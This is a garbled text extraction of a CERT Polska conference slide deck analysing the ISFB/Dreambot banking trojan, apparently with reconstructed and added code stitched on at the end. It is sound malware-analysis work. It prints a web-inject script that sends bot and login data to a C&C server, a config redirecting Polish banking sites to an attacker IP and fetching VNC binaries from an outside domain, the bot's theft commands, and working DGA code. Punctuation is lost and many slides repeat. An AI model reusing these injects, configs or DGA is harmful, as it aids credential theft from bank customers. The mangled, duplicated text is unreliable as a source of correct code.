  var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=8&u_login=&u_pass=&log=" + get_me_core;
  sendScriptRequest(sa, req, function statusCall1() {
      var element = document.getElementById("loader");
      element.parentNode.removeChild(element);
  });
  })();

[28/58] Web Actions

  · FILE
  · SCREENSHOT
  · HIDDEN
  · NEWGRAB
  · VIDEO
  · PROCESS
  · POST
  · VNC

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 17: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 18: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

The Bot

Registry Keys

Software\AppDataLow\Software\Microsoft\{GUID}, where the GUID matches
[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

Value names under that key:

- Install
- Client
- NetCfg
- LastTask
- LastConfig

Other Actions

- GET_CERTS
- GET_COOKIES
- GET_SYSINFO
- LOAD_EXE
- GET_FILES
- SOCKS_START
- GET_KEYLOG
- GET_MAIL
- GET_FTP
- VNC_START
- URL_BLOCK

Calling Home

ET phone home

- Static domains inside configuration files
- DGA based on a template and the current date
- C&C hidden in the TOR network
- P2P network

DGA

    # Reconstructed from the slide (Python 2 style). LsaRandom, kwargs, words,
    # self.DGA_MIN_LEN and self.DGA_MAX_LEN are defined elsewhere in the
    # author's code; only this generation loop was on the slide.
    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0   # second seeding as shown on the slide; it overrides the first
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # i.e. rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN       # target length of the label
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)            # pick a word from the template word list
            ws = len(d)
            if not rnd.rnd() % 3:
                ws //= 2                     # one time in three, use only half of the word
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

PYTHON

TOR (screenshot slide; image not extracted)

P2P

    typedef struct {
        DWORD magic;          // 0x395f2ec1
        DWORD my_secret;
        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                   // 4 random higher bytes of keys
        isfb_p2p_inner_packet p;      // encrypted
    } isfb_p2p_packet;

C

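A parser for the two-layer P2P packet above, added here as an example (not the author's code). The cipher applied to the inner packet and how the salt feeds the key are not on the slide, so decryption is a pluggable callable and the constructed sample uses an identity stand-in; the magic check is what tells a wrong key or a non-ISFB datagram apart from a valid packet.

```python
import struct

# Added example, not the author's tooling. Layout follows the slide:
#   outer: BYTE flags, DWORD salt, then the encrypted inner packet
#   inner: DWORD magic (0x395f2ec1), DWORD my_secret, DWORD his_secret,
#          BYTE cmd0, BYTE cmd1, BYTE data[]
P2P_MAGIC = 0x395F2EC1
OUTER = struct.Struct("<BI")       # flags, salt (no alignment padding on the wire)
INNER = struct.Struct("<IIIBB")    # magic, my_secret, his_secret, cmd0, cmd1


def parse_p2p_packet(raw, decrypt=lambda salt, ct: ct):
    """Split the outer header off, decrypt the rest and validate the inner packet.

    `decrypt(salt, ciphertext)` stands in for the bot's cipher, which the slide
    does not name; the default identity only suits constructed test data."""
    if len(raw) < OUTER.size + INNER.size:
        raise ValueError("packet too short for an ISFB P2P packet")
    flags, salt = OUTER.unpack_from(raw, 0)
    inner = decrypt(salt, raw[OUTER.size:])
    if len(inner) < INNER.size:
        raise ValueError("inner packet too short after decryption")
    magic, my_secret, his_secret, cmd0, cmd1 = INNER.unpack_from(inner, 0)
    if magic != P2P_MAGIC:
        # Wrong key, garbage or a different protocol: the magic is the cheapest check.
        raise ValueError("bad inner magic 0x%08x" % magic)
    return {"flags": flags, "salt": salt, "my_secret": my_secret,
            "his_secret": his_secret, "cmd": (cmd0, cmd1), "data": inner[INNER.size:]}


def build_p2p_packet(flags, salt, my_secret, his_secret, cmd0, cmd1, data,
                     encrypt=lambda salt, pt: pt):
    """Inverse of parse_p2p_packet, used here only to build constructed samples."""
    inner = INNER.pack(P2P_MAGIC, my_secret, his_secret, cmd0, cmd1) + data
    return OUTER.pack(flags, salt) + encrypt(salt, inner)
```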
Internet is Hard

URL format

Request format string used by the bot (punctuation reconstructed; the % signs were lost in extraction):

    http://%s%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

Sample requests from the slide: an old-style t[RAND].php?[RAND]=data request, the decrypted parameter string of such a request, and a current-style request with the data in the image name.

    tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY
    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f
    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg
    t[RAND].php?[RAND]=data

URL format

    import re
    import pprint

    # decrypt() and SKEY are defined elsewhere in the author's tooling;
    # d holds the value of the encoded query parameter (Python 2 code).
    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    # undo the URL-safe escaping used by the bot: "_2B" -> "+", "_2F" -> "/" and so on
